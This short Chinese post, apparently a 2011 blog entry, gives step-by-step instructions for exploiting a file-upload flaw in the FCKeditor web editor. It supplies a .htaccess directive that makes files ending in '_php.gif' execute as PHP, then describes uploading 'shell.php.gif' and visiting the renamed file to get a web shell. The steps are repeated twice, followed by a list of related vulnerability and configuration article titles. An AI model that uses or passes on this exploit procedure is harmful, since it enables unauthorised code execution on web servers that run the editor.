FCKeditor编辑器全版本上传漏洞
2011-08-26 10:14
417 查看
漏洞利用方法:
1.创建一个htaccess文件:
加入以下代码:
2.使用编辑器上传htaccess文件.
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://xxxx/上传目录/shell_php.gif
1.创建一个htaccess文件:
加入以下代码:
<FilesMatch “_php.gif”> SetHandler application/x-httpd-php </FilesMatch>
2.使用编辑器上传htaccess文件.
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://xxxx/上传目录/shell_php.gif
相关文章推荐
- FCKeditor编辑器全部版本另类上传漏洞
- FCKeditor编辑器上传漏洞
- UTF8 编码时 FCKeditor编辑器上传文件时中文文件名解决方案
- PHP配置FCKeditor编辑器以及上传图片
- 添加了代码着色和图像上传的FCKeditor在线编辑器.NET版
- fckeditor任意文件上传漏洞
- Discuz NT 多个版本文件上传漏洞
- ECSHOP编辑器Fckeditor上传图片中文名称乱码的解决方法
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
- ecshop更换升级FCKeditor编辑器到Kindeditor,支持图片批量上传,和百度地图添加
- 彻底禁用fckEditor的上传功能(含防止Type漏洞问题)
- FCKeditor编辑器配置详解(最新版本配置)
- fckeditor编辑器上传文件出现invalid Request问题解决
- FCKeditor2.6.5及后续版本 for PHP配置及中文上传乱码问题
- 使用FCKeditor_2.6.3版本有关上传图片问题解决
- 新突破fckeditor漏洞 通杀asp、aspx版本
- FCKeditor编辑器添加图片上传功能及图片路径问题解决方法
- Fckeditor 2.4.2 php任意上传文件漏洞+修补方法